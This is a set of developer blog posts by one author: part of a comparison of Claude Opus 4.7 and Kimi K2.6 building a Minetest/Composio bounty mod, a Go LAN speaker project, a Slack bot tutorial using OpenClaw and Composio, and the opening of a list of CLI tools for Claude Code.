It worked end to end without much tweaking. I only had to configure ~/.minetest/minetest.conf and add this line:
secure.http_mods = bountyboard
Pretty much everything else was smooth. Great quick MVP.

I noticed one small issue: mine_node bounties can be farmed by placing and then re-mining the same blocks, because vanilla Minetest does not track who placed a node.

But that's fine. That is not really a code issue here.

Kimi K2.6

The core idea worked. Kimi created the TypeScript backend, the Minetest/Luanti mod, the bounty commands, task tracking, completion flow, rewards, and leaderboard logic.

The backend side looked solid enough. It used Express, Zod, and Vitest, and the main routes were there:

/health
/api/bounty/generate
/api/bounty/complete
/api/leaderboard

It also created the Lua mod files properly and handled the basic /bounty flow inside Minetest. The code was not bad either. I just felt like it was not as clean or modular as what Opus 4.7 wrote.

But there was one really irritating issue.

Somehow, Kimi wrote the global Minetest config in ~/.minetest/minetest.conf with this:

secure.http_mods = bountykimi

But then it also created a world config and added a different mod name there.

So when I loaded the world, Minetest used the world-level config. That basically overrode the global config behavior I was expecting. Because of that, the HTTP API was not enabled for the actual mod that was running.

This took me more than half an hour to debug.

And honestly, because I do not have much experience with Minetest config behavior, this was super annoying.

The run itself was much cheaper and faster than Opus. Kimi used around 52k context tokens, took about 9 minutes 27 seconds, and cost around $0.39.

That price difference is pretty wild. Opus cost around $3.59 for the first test, while Kimi came in under $0.40.

You can find the code it generated here: Kimi K2.6 Code

Here's the demo:

Cost: ~$0.39
Duration: ~9min 27sec
Code Changes: +4,671 lines, 0 lines removed
Context Used: 52,073 tokens
Context Window Used: 20%

Quick Verdict

The local bounty board idea worked, the code was usable, and the model clearly understood the Lua + TypeScript setup. But if you notice, Kimi wrote more than twice as much code as Opus 4.7.

The main problem was the Minetest config mess. It added secure.http_mods = bountykimi globally, but then created another world-level config with a different mod name, which made debugging way more painful.

So yeah, Kimi passed the first test, but not as smoothly as Opus.

Test 2: Real Composio Integration

Now this is where the actual test, and the fun, begins.

The custom mod is ready, so now it is time to integrate Composio and give the game a quick agentic touch.

The idea is simple. As players progress through the game, their bounty completions get logged into Google Sheets with Composio.

Claude Opus 4.7

Claude Opus 4.7 did manage to add the real Composio integration, but this one was not as smooth as Test 1.

The backend could sync bounty completions to Google Sheets. The nice thing is that I did not even need to open Minetest to test whether it was working. Because the project was structured cleanly, I could test the whole backend flow with just two curl requests.

First, generate a bounty:

curl -s -X POST http://localhost:8787/api/bounty/generate \
  -H 'Content-Type: application/json' \
  -d '{"player":"singleplayer","availableTasks":["collect_item"]}' \
  | tee /tmp/b.json | jq

Then complete it:

curl -s -X POST http://localhost:8787/api/bounty/complete \
  -H 'Content-Type: application/json' \
  -d "$(jq -nc \
        --argjson b "$(jq .bounty /tmp/b.json)" \
        --arg ts "$(date -u +%Y-%m-%dT%H:%M:%SZ)" \
        '{player:"singleplayer", bounty:$b, progress:{current:$b.target.count, required:$b.target.count}, completedAt:$ts}')" \
  | jq

And if everything is configured correctly, the second response looks like this:

{
  "ok": true,
  "message": "Bounty completed.",
  "leaderboard": {
    "player": "singleplayer",
    "points": 8,
    "completedBounties": 1
  },
  "sync": {
    "googleSheets": {
      "ok": true,
      "message": "Google Sheets row appended."
    }
  }
}

This is one of the things I love about Opus the most. It usually creates a pretty modular setup. The game mod, backend logic, and external sync were separated well enough that I could test the Composio part directly from the API without needing to run around inside the game every time.

It did run into a dev server issue where the tsx command was parsing watch incorrectly and treating it like the entry file.

After a bit of back and forth, it fixed the error. It eventually built a small runtime env loader and adjusted the config import so the backend could read the environment properly before the rest of the app booted.

After that, the build worked and the Google Sheets sync started working.

But that cost was painful. It literally cost me around $16. Like, actually :(. If you are not watching usage, this thing can make you broke real fast.

It took 28min 52sec API time, and about 1hr 17min wall time.

Apart from that, the code did work. But it cost way more than I expected for one run.

You can find the code it generated here: Claude Opus 4.7 Code - Composio

Here's the demo:

Cost: $16.03
Duration: 28min 52sec API time, 1hr 17min 40sec wall time
Code Changes: +1,848 lines, 507 lines removed
Token Usage:
- Input: 100.2k with Claude Haiku 4.5, plus Opus usage shown in the session
- Output: 3.2k with Claude Haiku 4.5, 123.3k with Claude Opus 4.7
- Cache read: 22.3M
- Cache write: 269.3k

Quick Verdict:

Claude Opus 4.7 got the real Composio integration working, especially the Google Sheets logging.

How cool is that? You add a custom agentic feature inside a game. A literal public game.

So yes, it worked. But $16 for this one run hurt.

Kimi K2.6

Kimi K2.6 did not do well on this test. It was pretty much busted.

From the start, it ran into a bunch of errors. The dev server broke, tests were failing, and even after a little handholding, it only managed to fix part of the test situation.

It eventually got past some of those failures, but the bigger problem was the actual Composio implementation. It did not seem fully sure how to wire the integration cleanly into the existing backend.

I had to stop and help again and again, but it still could not make meaningful progress with the build.

After spending more than 25 minutes and burning over 130k tokens, there was still no real progress. At that point, I had to stop the run.

Why on earth is it reading a version.txt file?

So yeah, I am calling this one a fail for Kimi K2.6.

Cost: ~$5.03
Duration: ~25min
Token Usage: 135,109+

Quick Verdict:

Kimi K2.6 failed this test.

It got stuck around tests, build issues, and the real Composio implementation. Even with manual help, it could not get the integration into a clean working state.

For the local bounty board, Kimi was surprisingly usable. But once the task moved into real external integration, it struggled a lot more.

Final Thoughts

Both Claude Opus 4.7 and Kimi K2.6 were pretty solid in this test, at least for the local version.

The task was not that simple either. It had Lua, TypeScript, SDK docs, backend logic, game commands, and the full flow had to work end to end.

Plus, the idea itself is not that common. Building an AI agent concept inside a custom game mod is not easy, and it is definitely not a one-shot thing, so props to both models.

Opus 4.7 did better overall. The code was cleaner, and as usual, Anthropic models are pretty good at that.

The only thing I hate with Anthropic models is the session limit.

I absolutely hate how little session usage you get. Opus 4.7 especially just eats through it completely in like 3 to 5 prompts.

Kimi K2.6 is an interesting model. Open models have not always been the best in my experience with real-world projects, but with every new model, my expectations rise a little.

Let's see where Kimi K2.6 goes from here.

Shrijal AcharyaFollow

SDE • GOLD @Microsoft Student Ambassador • Prev Lead Collab and Dev-Team Lead @oppiaorg • Mail for collaboration

My speaker broke, so I built a LAN speaker

Shrijal Acharya — Tue, 28 Apr 2026 14:29:00 +0000

What's happening?

This was around a year back when I started the project, after a small speaker that I had broke out of nowhere. Won't connect.

I used it to listen to music every night before going to sleep (not sure if anybody else does the same, but it's one of my only fixed routines since childhood :D).

The idea

Okay, so what's the idea?

I had a thought. Why not build something resembling a speaker? Although I had never worked on a project that required working with audio and all that, I knew what I'd use to implement something like that, which was WebSocket (I'll explain why I chose it in a moment).

And I did start on it.

The irony is that I had just finished Tour of Go, Let's Go, Let's Go Further, and had just started on 100 Go Mistakes and How to Avoid Them.

So... I had to do this in Golang.

I had quite a good idea of how to work with Golang, so it had to be done with it, also because I wanted to get away from the JavaScript ecosystem (the same Node.js, React, Next.js, yada yada was just too much).

Why WebSocket

So, let's come to the plan. Why WebSocket?

The main reason is that when I had the idea, it was WebSocket that came to my mind, and it's what I thought of before even starting to code the project.

And WebSocket kind of makes sense as well. This was my thought process.

Lets you connect multiple connections from one device? Yes
Is synchronous enough when streaming over multiple devices in LAN? Yes
Something I've worked with a lot? Totally Yes

That's pretty much the reason I chose WebSocket. It might not be the best option, but it's what I had and something I was confident with when I started.

One more thing I'll add here: since I'm streaming audio frames sequentially (PCM chunks, one after another), I actually need them to arrive in order.

WebSocket runs over TCP, so that's handled for me. I don't have to think about it. That alone made it feel like the right call.

Why not WebRTC or UDP?

Let me tell you something pretty frankly: I never even knew there was something like WebRTC. I came across this term while building the project halfway through it.

So, why not UDP?

Okay, so UDP is connectionless, which means there's no guarantee that every packet arrives, and more importantly, no guarantee they arrive in order. For something like video calls or games, that's totally fine. You drop a frame, move on, nobody cares.

But for audio? If a chunk goes missing or arrives out of order, you either get silence or a glitch.

And since I'm streaming raw PCM (basically just a stream of bytes that represent sound), every single chunk matters. You can't just skip them.

So UDP was out as well.

And WebRTC? Also, WebRTC is mostly built around browser-to-browser, peer-to-peer stuff. My setup is a server broadcasting to multiple clients over LAN, which isn't really what WebRTC is designed for. So even if I knew about it from day one, I'm not sure it would've been the right fit anyway.

WebSocket was fine. It worked. And sometimes that's enough. I didn't want to overengineer.

👀 I learned about all these new terms like PCM, WebRTC, and all that stuff during the build. So, I might say something wrong. I'm not really that familiar with them. So, just hit me in the comments if so.

The Architecture

Okay, so the high level is pretty simple.

There's a server and there are clients. The server is where the music is stored, and the clients are the devices that play it (could be the same device).

Here's what actually happens when you press play:

The server takes the MP3 file, decodes it into raw PCM (basically just bytes of sound data), and starts broadcasting those bytes over WebSocket to every connected client. No client-side decoding. The server does all of that.

Here's a high level architecture:

The tricky part is sync. If you just start streaming, each client will start playing at slightly different times, and it'll sound like a little echo.

So what I did is, before playback starts, the server sends a timestamp to all clients saying, "Start playing at exactly this moment in time." Every client gets that timestamp, buffers the audio frames, and waits. When the clock hits that time, everyone starts together.

It works because on a LAN with NTP, all the device clocks are usually within a millisecond or two of each other. Close enough that you can't tell the difference (much).

That's the whole thing, honestly.

Server decodes -> broadcasts -> clients sync -> play

What I still don't know

Okay, so during the build, I ran into something I didn't fully understand.

Turns out your speaker doesn't play audio the exact moment you write data to it. There's some time it spends sitting in a system buffer before it actually comes out. And that delay varies by OS and audio system. On Linux, it's something around 50ms, I feel.

Honestly, I had no idea there was something like this that you need to account for. This thing was completely debugged by GPT-5.4. There's a hardcoded 50ms constant in the code that is counted when clients actually start playing.

There's also something in the code that keeps checking, roughly every second, whether the audio playing on your device is slightly ahead or behind.

If it is, it quietly adds or removes a tiny bit of audio to bring it back in line. So small you'd never hear it.

Both of these kind of work. I tested it. I just couldn't tell you exactly why the numbers are what they are.

How I usually run it

Since my plan is to use my whole laptop as a "speaker", I usually have the server and client on the same system (my personal laptop).

And I usually have it like this:

Start the server:

gophercast serve # now follow the TUI setup....

Connect clients (each in a tmux split). Usually, I have around 2 clients when running on the same machine. More than 2 kind of distorts the audio quality.

gophercast play --host <ip_from_serve> --port 8080 --name "client 1"
gophercast play --host <ip_from_serve> --port 8080 --name "client 2"

The steps are the same when connecting from multiple machines. Just make sure that all of them are connected to the same LAN.

Here's a quick demo on a single machine, working as the speaker.
(Ignore the audio quality)

My take

I'm pretty happy with how this worked out.

This was my very first time working with Charm's Bubbletea and the whole audio stuff.

I started this project just because I wanted to DIY. It was just the perfect time: my speaker broke, and I had somehow finished learning basic Go programming.

There's probably still a ton of bugs. I've tried to test most of it. I just picked the tool I knew and figured it out as I went.

It plays music across multiple devices in sync, or the same one if you connect through multiple terminals. My laptop, another computer, whatever's connected, all playing together.

That's what I wanted. That's what it does.

(I haven't tested how well it works on Mac, so I can't tell there. Also, I'm not sure Windows will work either due to oto's limitation and our hardcoded 50ms delay.)

You can find the repo here: shricodev/gophercast

🚀 Want to build such cool stuff? You learn hands on here: CodeCrafters

Shrijal AcharyaFollow

SDE • GOLD @Microsoft Student Ambassador • Prev Lead Collab and Dev-Team Lead @oppiaorg • Mail for collaboration

How to Automate Your Slack Workspace with OpenClaw and Composio 🚀

Shrijal Acharya — Thu, 16 Apr 2026 15:19:55 +0000

Your team already lives in Slack. Code reviews, project updates and what not, it all happens there.

But the moment you need to file a GitHub issue, check a Linear ticket, or send a follow-up email, you leave Slack, do the thing, and come back. That context switch adds up.

What if your Slack workspace had an assistant that could do all of that for you, right in the thread. That too an isolated OpenClaw instance per user with admin control? 🤯

In this article, you'll learn how to automate an entire Slack team workspace that connects to your tools, takes actions, without you ever leaving Slack.

What's Covered

To quickly summarize what we’ll cover in this blog post, here’s what we’ll go through:

The idea behind building a Slack bot around OpenClaw.
How Composio lets each user connect their own tools.
How OpenClaw powers replies and tool usage.

These are a few things you'll understand, but there's so many others you'll learn along the way.

So, if you want to build a Slack-first (though not limited to) AI with personal tool access for each user, this will give you a solid starting point.

What we're building

We're building a Slack bot that brings OpenClaw into Slack.

💁 Not necessarily only for Slack, you can use pretty much the same setup for something like Discord with their SDK or your custom app. The idea remains the same.

Overall the idea is to use OpenClaw and give every user in a workspace their own single instance of it which powers the AI assistant.

That way, things are isolated per user and the admin can control/limit the toolkits (GitHub, Linear, etc.) the users get access to.

Each user can connect their own tools with Composio, so the bot can chat, and take actions using the tools they’ve authorized.

Here's a quick architecture.

Why Slack and how to create a Slack App?

No big reason to choose Slack, only because it supports slash commands, and it's mostly where people already work.

For this, we first need to have a Slack app, if you don't already have one, follow the quickstart guide to create one.

Once your app is created, enable Socket Mode so the bot can receive events without exposing a public webhook URL.

Then add at least these Bot Token Scopes:

app_mentions:read
chat:write
commands
im:history
im:read
users:read

Subscribe to these Bot Events:

app_mention
message.im

And create these Slash commands:

/connect: Use it something like /connect <toolkit>
/connections: User lists active connections
/help: Shows usage summary
/assign: Admin assigns an OpenClaw instance to a user
/add-mcp-config: Admin registers an MCP Config from platform.composio.dev
/add-auth-config: Admin links a toolkit to its Composio auth config
/list-mcp-configs: Admin lists all registered MCP Configs

Finally copy these values to your .env file, which you can find in the app settings:

SLACK_BOT_TOKEN=xoxb-...
SLACK_APP_TOKEN=xapp-...
SLACK_SIGNING_SECRET=...

Your SLACK_BOT_TOKEN is the bot token itself, SLACK_APP_TOKEN is the Socket Mode app level token and SLACK_SIGNING_SECRET is used by Slack to verify requests.

How to Set Up the Project

It's fairly simple to get this project up and running. Follow these steps:

git clone https://github.com/shricodev/saas-openclaw-slackbot.git
cd saas-openclaw-slackbot

Next, you install the dependencies:

npm install

Then set up the environment variables and run the development server:

# Slack
SLACK_BOT_TOKEN=xoxb-...
SLACK_APP_TOKEN=xapp-...
SLACK_SIGNING_SECRET=...

# Database
DATABASE_URL=...

# Composio api key (ak...) from https://platform.composio.dev
COMPOSIO_API_KEY="ak_..."

To get the Composio API key:

Log in at platform.composio.dev
Copy your API key (ak_..) from the Composio dashboard settings, then set it:

Configure Composio Dedicated MCP Server

In this section, we'll go through the process of creating a dedicated MCP server in Composio for each user.

First, head over to platform.composio.dev
Under the MCP Configs tab, create a Dedicated MCP Server. This lets you create MCP servers with specific apps and tools, which is exactly what we want.

Select all the toolkits you plan to assign for the user and create the MCP server.

For the External User ID, use the user's Slack user ID. To get someone's Slack user ID, head over to their profile, click the three dots, and select Copy Member ID.

Use that as the External User ID.

Keep note of the MCP config name and MCP config ID. You will need both when configuring the bot in Slack.

Upon successful creation, you'll find the URL:

You can copy this URL directly and add it to the OpenClaw config, which we’ll cover later in the Configure OpenClaw with Composio section. Alternatively, the bot can fetch it for you after you run the /assign slash command, which we’ll configure later.

You will also need the auth config ID tied to the tools you selected. In the MCP server, head over to the Manage Config tab and click Manage Auth Config. The auth config ID is listed on that page.

Keep note of this as well. You will need it when running /add-auth-config in Slack.

Core Components in the Application

We're not going to code everything from scratch as that'd be too long and impractical. Let's go over some of the core components in the project.

Before we start with the project core components, here's the project tech stack:

Slack Bolt - Official Slack bot framework. We use it with Socket Mode, which connects to Slack over a WebSocket without needing a public HTTP endpoint.
OpenClaw - The agent layer. Exposes an OpenAI-compatible API but acts as a full agentic gateway that plans, calls tools, and reasons over results.
Composio - The core of the project. Manages OAuth connections to external apps like GitHub, Linear, and Gmail, and exposes them to the agent via MCP.
TypeScript - Obvious choice over JavaScript as we get type safe code.
PostgreSQL + Prisma - Handles user records, connection status, and per-thread conversation history.

Bootstrapping the Bot

This is where everything starts. We initialize the Slack Bolt app with Socket Mode, register all handlers, and start the server.

// 👇 app.ts

const app = new App({
  token: process.env.SLACK_BOT_TOKEN,
  appToken: process.env.SLACK_APP_TOKEN,
  signingSecret: process.env.SLACK_SIGNING_SECRET,
  socketMode: true,
});

registerMessageHandlers(app);
registerCommandHandlers(app);

(async () => {
  const port = Number(process.env.PORT) || 3000;
  await app.start(port);
  console.log(`Bot is running on port ${port} (socket mode)`);
})();

Instead of exposing a public HTTP endpoint for Slack to POST events to, Socket Mode opens a WebSocket connection. This means you can run the bot anywhere could be your local machine, a private server without a public URL.

If you've worked with bots before, this should be pretty straight-forward to understand. 👀

Handling User Messages

This is the brain of the bot. It handles both direct messages and @mentions in channels.

// 👇 message.handler.ts

async function handleUserMessage({
  message,
  client,
  text,
  channelId,
  threadTs,
}) {
  await saveMessage(
    slackUserId,
    slackTeamId,
    channelId,
    threadTs,
    "user",
    text,
  );

  const history = await getThreadHistory(
    slackUserId,
    slackTeamId,
    channelId,
    threadTs,
  );
  const priorHistory = history.slice(0, -1);

  const thinkingMsg = await client.chat.postMessage({
    channel: channelId,
    thread_ts: threadTs,
    text: "_Thinking..._",
  });

  const response = await generateResponse(
    openclawConfig.gatewayUrl,
    openclawConfig.gatewayToken,
    text,
    priorHistory,
    sessionKey,
  );

  await saveMessage(
    slackUserId,
    slackTeamId,
    channelId,
    threadTs,
    "assistant",
    response.content,
  );

  await client.chat.update({
    channel: channelId,
    ts: thinkingMsg.ts,
    text: response.content,
  });
}

There's a few things you might notice right up:

First, we store the user's message to the database before sending it to OpenClaw. But why? This way if the request fails, the history isn't broken. Similar to storing chat history in localhost when creating web chat applications.

I do not know if there’s a better way to handle this, but right now we just show a Thinking... message while the AI is generating the full response, and then replace it once the final output is ready.

A little hacky, maybe, but it gets the job done. There are probably better ways to handle this, like streaming the response, but for now the old-school approach works. 😋

Slash Commands

The bot exposes seven slash commands split into two groups: user-facing (/connect, /connections, /help) and admin-only (/assign, /add-mcp-config, /add-auth-config, /list-mcp-configs).

/connect

/connect <toolkit> starts an OAuth flow for a tool like GitHub or Gmail. But unlike the previous version where any user could connect any toolkit, now the bot checks three things before starting a connection:

Does this user have an MCP Config assigned?
Is the requested toolkit in that config?
Is there an auth config registered for this toolkit?

// 👇 command.handler.ts

app.command("/connect", async ({ command, ack, respond }) => {
  await ack();
  const toolkitSlug = command.text.trim().toLowerCase();
  const apiKey = getComposioApiKey();

  const assignment = await db.mcpConfigAssignment.findUnique({
    where: {
      slackUserId_slackTeamId: {
        slackUserId: command.user_id,
        slackTeamId: command.team_id,
      },
    },
    include: { mcpConfig: true },
  });

  if (!assignment) {
    await respond({
      response_type: "ephemeral",
      text: "You have not been assigned an MCP Config. Ask your admin to run `/assign`.",
    });
    return;
  }

  if (!assignment.mcpConfig.toolkitSlugs.includes(toolkitSlug)) {
    await respond({
      response_type: "ephemeral",
      text:
        "This toolkit is not available in your assigned config. " +
        "Your admin controls which toolkits you can access.",
    });
    return;
  }

  const toolkitAuth = await db.mcpToolkitAuth.findUnique({
    where: {
      slackTeamId_toolkitSlug: {
        slackTeamId: command.team_id,
        toolkitSlug,
      },
    },
  });

  // check if already connected
  const connectedToolkits = await getConnectedToolkits(apiKey, command.user_id);
  if (connectedToolkits.includes(toolkitSlug)) {
    await respond({
      response_type: "ephemeral",
      text: `You're already connected to *${toolkitSlug}*.`,
    });
    return;
  }

  const redirectUrl = await initiateConnection(
    apiKey,
    toolkitAuth.authConfigId,
    command.user_id,
  );

  await respond({
    response_type: "ephemeral",
    text: `Click here to connect *${toolkitSlug}*: ${redirectUrl}`,
  });
});

The response is only visible to the user who ran the command. That's intentional as OAuth URLs are personal and shouldn't be visible to the whole channel.

/assign

/assign is admin-only and lets admins assign a specific OpenClaw gateway to a user. It opens a Slack modal to collect the gateway URL, token and MCP config server ID.

// 👇 command.service.ts

app.command("/assign", async ({ command, ack, respond, client }) => {
  await ack();

  const userInfo = await client.users.info({ user: command.user_id });
  const isAdmin = userInfo.user?.is_admin || userInfo.user?.is_owner;

  if (!isAdmin) {
    await respond({
      response_type: "ephemeral",
      text: "Only workspace admins can assign OpenClaw instances.",
    });
    return;
  }

  await client.views.open({
    trigger_id: command.trigger_id,
    view: assignInstanceModal, // includes gateway URL, token, and MCP Config ID fields
  });
});

The user's MCP URL looks something like this: https://backend.composio.dev/v3/mcp/aaa-111/mcp?user_id=<slack_user_id>

It's the key because it's what connects the user's OpenClaw instance to the toolkits the admin selected for them.

/add-mcp-config and /add-auth-config

These two admin commands register the Composio resources in the bot's database. Both open modals.

/add-mcp-config registers an MCP Config by name and server ID:

// On modal submit:
await db.mcpConfig.create({
  data: {
    slackTeamId: teamId,
    composioServerId, // the UUID from the MCP URL
    name, // e.g. "Engineering"
    toolkitSlugs, // e.g. ["github", "linear"]
  },
});

/add-auth-config links a toolkit slug to its Composio auth config ID. This is what /connect uses to know which auth config to pass when initiating a connection:

// On modal submit:
await db.mcpToolkitAuth.upsert({
  where: {
    slackTeamId_toolkitSlug: { slackTeamId: teamId, toolkitSlug },
  },
  create: { slackTeamId: teamId, toolkitSlug, authConfigId },
  update: { authConfigId },
});

/list-mcp-configs

A simple admin command that lists all registered MCP Configs for the workspace:

"Engineering" - server: - toolkits: github, linear
"Sales" - server: - toolkits: gmail, notion

Sending Requests to OpenClaw

Up until this point we were working on the Slack side and a bit of Composio setup, but how do we actually send these messages to OpenClaw?

OpenClaw exposes an OpenAI-compatible /v1/chat/completions endpoint. Our service code wraps that with a proper system prompt, conversation history, and error handling. Nothing super unknown to most of you.

// 👇 openclaw.service.ts

export async function generateResponse(
  gatewayUrl: string,
  gatewayToken: string,
  userMessage: string,
  history: Array<{ role: string; content: string }>,
  sessionKey?: string,
): Promise<OpenClawResponse> {
  const systemPrompt: ChatMessage = {
    role: "system",
    content:
      "You are a helpful assistant in a Slack workspace. " +
      "You have access to the user's connected tools (GitHub, Linear, Gmail, etc.) through Composio. " +
      "The user's tools are already connected. Do not ask them to connect or authenticate. " +
      "Use the available Composio tools directly to answer questions. " +
      "Be concise. Format responses for Slack (use mrkdwn syntax).",
  };

  const messages: ChatMessage[] = [
    systemPrompt,
    ...history.map((m) => ({
      role: (m.role === "user" ? "user" : "assistant") as "user" | "assistant",
      content: m.content,
    })),
    { role: "user", content: userMessage },
  ];

  return sendToOpenClaw(gatewayUrl, gatewayToken, messages, sessionKey);
}

We also wrap the raw fetch in a custom OpenClawError class with error codes for timeouts, auth failures, and gateway errors. Preferred thing you do in a real-world codebase.

💡 Prefer something built-in like fetch over third-party tool like axios. Especially now after the recent compromise of axios which is used by hundreds and thousands of applications.

Connecting tools with Composio

You might be familiar working with Composio over the SDK @composio/core.

But with Composio, you can also directly talk to it's REST API. We now talk to the Composio REST API on backend.composio.dev using an API key from platform.composio.dev.

There are only three functions in the service, and each one does exactly what the name suggests 🤌

Check what a user has connected:

// 👇 composio.service.ts

export async function getConnectedToolkits(
  apiKey: string,
  slackUserId: string,
): Promise<string[]> {
  const url = `${COMPOSIO_API_BASE}/connected_accounts?user_id=${encodeURIComponent(slackUserId)}`;
  const res = await fetch(url, {
    method: "GET",
    headers: { "x-api-key": apiKey },
    signal: AbortSignal.timeout(30_000),
  });

  const data = await res.json();
  return data.items
    .filter((account) => account.status === "ACTIVE")
    .map((account) => account.toolkit.slug);
}

Initiate a new connection:

// 👇 composio.service.ts

export async function initiateConnection(
  apiKey: string,
  authConfigId: string,
  slackUserId: string,
): Promise<string> {
  const url = `${COMPOSIO_API_BASE}/connected_accounts`;
  const res = await fetch(url, {
    method: "POST",
    headers: {
      "Content-Type": "application/json",
      "x-api-key": apiKey,
    },
    body: JSON.stringify({
      auth_config: { id: authConfigId },
      connection: { user_id: slackUserId },
    }),
    signal: AbortSignal.timeout(30_000),
  });

  const data = await res.json();
  return data.redirect_url;
}

Build the per-user MCP URL:

// 👇 composio.service.ts

export function getMcpUrl(
  composioServerId: string,
  slackUserId: string,
): string {
  return `https://backend.composio.dev/v3/mcp/${composioServerId}/mcp?user_id=${encodeURIComponent(slackUserId)}`;
}

This last one is the most important. There's no API call, it's pure URL construction. But this URL is what ties everything together: the composioServerId controls which toolkits are available, and
the user_id scopes which credentials are used. When /assign runs, it computes this URL and shows it to the admin so they can configure it in the user's OpenClaw instance.

Persisting Users and Conversation

Every Slack user that messages the bot gets a record in our database keyed on (slackUserId, slackTeamId) pair. This is a safety net, as the same Slack user ID could theoretically exist across different workspaces.

// 👇 slack-user.service.ts

export async function resolveSlackUser(
  slackUserId: string,
  slackTeamId: string,
) {
  const existing = await db.slackUser.findUnique({
    where: { slackUserId_slackTeamId: { slackUserId, slackTeamId } },
  });

  if (existing) return existing;

  return db.slackUser.create({
    data: {
      slackUserId,
      slackTeamId,
      composioEntityId: `slack_${slackTeamId}_${slackUserId}`,
    },
  });
}

Conversation history is stored per-thread using Slack's thread_ts (the timestamp of the first message in a thread) as the thread id. When the bot receives a message, it fetches the full thread history and passes it to OpenClaw, giving it the memory for the duration of that thread.

Configuration Setup

The bot requires per-user OpenClaw instances assigned by an admin. If a user hasn't been assigned an instance, they can't use any features. /connect, /connections and chat all require an assignment first.

Why not use shared instance?

By shared instance, I mean all the users share the same OpenClaw instance. So why not use it that way? That's how server is supposed to work?

There's a few reasons:

By default, OpenClaw is not designed to support multiple users connecting to the same gateway concurrently. In practice, which is likely to be the case for our use case.

This is already the main reason.

Also, in general, letting multiple users use the same instance with multiple connected accounts is not safe. A prompt injection by one user could access or destroy another user's data.

Even if there's safety measure (which I'm not aware of). Things could always go wrong. So better safe than sorry.

// 👇 lib/config.ts

export async function getUserOpenClawConfig(
  slackUserId: string,
  slackTeamId: string,
): Promise<OpenClawConfig> {
  const user = await db.slackUser.findUnique({
    where: { slackUserId_slackTeamId: { slackUserId, slackTeamId } },
    select: { openclawGatewayUrl: true, gatewayToken: true },
  });

  if (user?.openclawGatewayUrl && user?.gatewayToken) {
    return {
      gatewayUrl: user.openclawGatewayUrl,
      gatewayToken: user.gatewayToken,
    };
  }

  throw new Error(
    "No OpenClaw instance assigned. Ask your admin to run /assign.",
  );
}

No assignment, no access. The admin runs /assign for each user, providing their OpenClaw gateway URL, token, and MCP Config. Until that happens, the bot won't respond to that user.

Configure OpenClaw with Composio

Great, now the code part is done. There's one thing that's still left.

Now, the actual reason to build the bot i.e. to get tools access is not configured within OpenClaw which we do with Composio. It's the most easiest.

There's multiple ways to configure OpenClaw with Composio. There's standard ways you can find here.

But, we won't follow the standard way, as by default it uses consumer key, which is a way it's designed by default.

But we won't work with consumer key, we directly work with the MCP URL.

Go ahead and modify the OpenClaw config file which lives in the ~/.openclaw/openclaw.json with the following:

// rest of the config...

  "plugins": {
    "allow": [ "composio", "...rest"],
    "entries": {
      "telegram": {
        "enabled": true
      },
      "composio": {
        "enabled": true,
        "config": {
          "enabled": true,
          // put the MCP URL you receive after running /assign for a user.
          "mcpUrl": "..."
        }
      }
    },
  }

This sets up one instance for one user. But how do you about configuring multiple instances for multiple users?

How do you run it for multiple users?

This only configures one user in the entire workspace. But what about the rest?

There are a few ways:

1. Separate machine or VMs:

Each user's OpenClaw runs on a different machine. Each has its own ~/.openclaw/openclaw.json with its own MCP URL. This is the cleanest but most expensive.

2. Use named OpenClaw profiles:

OpenClaw ships with a --profile flag out of the box:

  --profile <name>     Use a named profile (isolates OPENCLAW_STATE_DIR/OPENCLAW_CONFIG_PATH under ~/.openclaw-<name>)

You can use a different profile per user. If you name each profile after the user, you get an isolated config for each one on the same machine. Most efficient.

For example:

openclaw --profile bob
openclaw --profile shrijal

3. Separate OS users on one machine:

Somewhat impractical. You'd run one OpenClaw instance per OS user, which means creating a separate system account for each person. Possible, but not a great approach.

There could be hundreds of other ways to do it. These are just the ones I could think of. Do your own research, and you’ll probably find others.

Slack Workflow

Run these commands in order as an admin before any user can start chatting.

/add-mcp-config

/add-auth-config

Assign each user their OpenClaw instance and MCP Config:

/assign

This gives you the user's scoped MCP URL. Configure it in their OpenClaw instance.

Once assigned, users run:

/connect <toolkit>

That's it. After connecting, they can DM the bot or @mention it in a channel.

Bot in Action

Here's a quick demo of the bot in action:

Conclusion

So yeah, that's the whole idea.

A Slack bot on top of OpenClaw, with Composio handling user tool connections, ends up being a really solid setup.

At this point, you’ve got a good idea of how this bot works with Slack, OpenClaw, and Composio.

We covered the main flow, how users connect their tools, how everything comes together inside Slack, and why assigning one OpenClaw instance per user helps keep things isolated.

It keeps the setup clean and gives you a bot that’s actually useful.

That's all for this one.

You can find the entire source code here: shricodev/saas-openclaw-slackbot

Shrijal AcharyaFollow

SDE • GOLD @Microsoft Student Ambassador • Prev Lead Collab and Dev-Team Lead @oppiaorg • Mail for collaboration

Top 10 CLI Tools to Level-Up Claude Code

Shrijal Acharya — Mon, 06 Apr 2026 12:51:40 +0000

I've been using Claude Code more than any other AI agents recently.

And when it's the tool you use the most, it just makes sense to make that workflow as productive as possible.

A lot of the experience comes down to the small tools around it. The ones that help you search, navigate, review diffs, watch system usage, or just keep your workflow clean.

So this post is a simple list of the CLI tools I think pair really nicely with Claude Code.

There's an awesome repo with a curated collection of CLI tools for coding agents: awesome-agent-clis

What does "tools for Claude Code" actually mean?

Claude Code is already powerful on its own.

But it gets even better when you pair it with the right terminal tools, especially since you’re already working in the terminal.

I’m not talking about tools built specifically for Claude Code.

I mean the CLI tools that make the overall workflow smoother, faster, and easier to manage while Claude is working in your repo.

1. GitHub CLI

ℹ️ GitHub’s official CLI for working from the terminal.

What it is?

GitHub CLI is basically running GitHub from your terminal. You can create repos, check issues, review PRs, manage branches, and handle a bunch of GitHub workflow stuff without leaving your shell.

It can be as simple as:

gh repo create

for creating a new repository through an interactive prompt, which is one I use the most. And there are tons of other commands you can use.

Find all the others in the help window.

gh --help

Why use it with Claude Code?

This one probably will not be for everyone.

A lot of people do not want to give Claude access to their GitHub repos, and that is totally fair. But if you are comfortable with it, I honestly think it is one of the best tools to pair with Claude Code.

Or even if you do not want Claude directly using it, GitHub CLI is still great to have beside Claude Code since you can just run the commands yourself and keep moving without leaving the terminal.

2. Composio

ℹ️ An MCP server that connects Claude Code to hundreds of external apps.

What it is?

Composio is an MCP server you can add to Claude Code so it can work with 500+ apps.

You can find the guide on how to connect Composio with Claude Code here: Composio Universal CLI

Why use it with Claude Code?

The main way I use Composio with Claude Code is for email.

Say I am working on something and need to send a mail to someone.

Without this, I would usually have to stop, open my mail client, write the message, double check it, and send it myself.

With Composio set up inside Claude Code, I can just ask Claude to draft the email, or give it the content and the recipient, and it can handle the rest for me.

And maybe most importantly, no more spelling mistakes in your emails. 😃

